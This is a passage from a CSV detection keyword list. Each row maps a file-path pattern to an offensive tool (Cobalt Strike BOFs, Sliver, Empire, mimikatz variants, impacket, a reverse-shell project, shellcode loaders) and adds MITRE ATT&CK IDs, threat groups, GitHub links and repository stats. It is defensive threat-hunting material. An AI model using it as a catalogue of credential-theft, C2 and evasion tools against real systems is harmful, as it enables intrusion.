- T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*/SilentClean/SilentClean/*.cs*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*/silentdump.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/silentdump.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca 
- Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/SilentHound.git*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" +"*/SilentMoonwalk.git*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" +"*/silentprocessexit.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*/silenttrinity/*.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"*/simple_hijacker/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*/SimpleLoader.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*/SimpleLoader.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*/Simple-Reverse-Shell*","offensive_tool_keyword","Simple-Reverse-Shell","Simple C++ reverse shell without obfuscation to avoid Win 11 defender detection (At the time of publication","T1548 - T1562 - T1027","TA0003 - 
TA0008","N/A","N/A","Shell spawning","https://github.com/tihanyin/Simple-Reverse-Shell/","1","1","N/A","N/A","2","114","30","2021-12-21T15:51:48Z","2021-12-19T22:16:32Z"
+"*/SimplyEmail.git*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z"
+"*/sip-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/sip-call-spoof.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/sip-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/sip-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Sitadel.git*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*/sitadel.log*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*/sitadel.py*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*/sites-available/striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - 
T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*/sites-enabled/striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*/situational_awareness/*.exe","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1143","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/situational_awareness/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1147","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/skelsec/pypykatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/skelsec/pypykatz","1","1","N/A","10","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*/skypev2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Slackor.git*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/Slackor/*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/sleep_python_bridge/*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*/Sleeper/Sleeper.cna*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*/sleepmask.cna*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*/slinky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large 
Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/SlinkyCat.git*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*/sliver.git*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver.pb.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver.proto*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" 
+"*/sliver/evasion/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver-server*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/smb.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/smb/psexec.rb*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/SMB_RPC/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/smb2-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb2-security-mode.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb2-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - 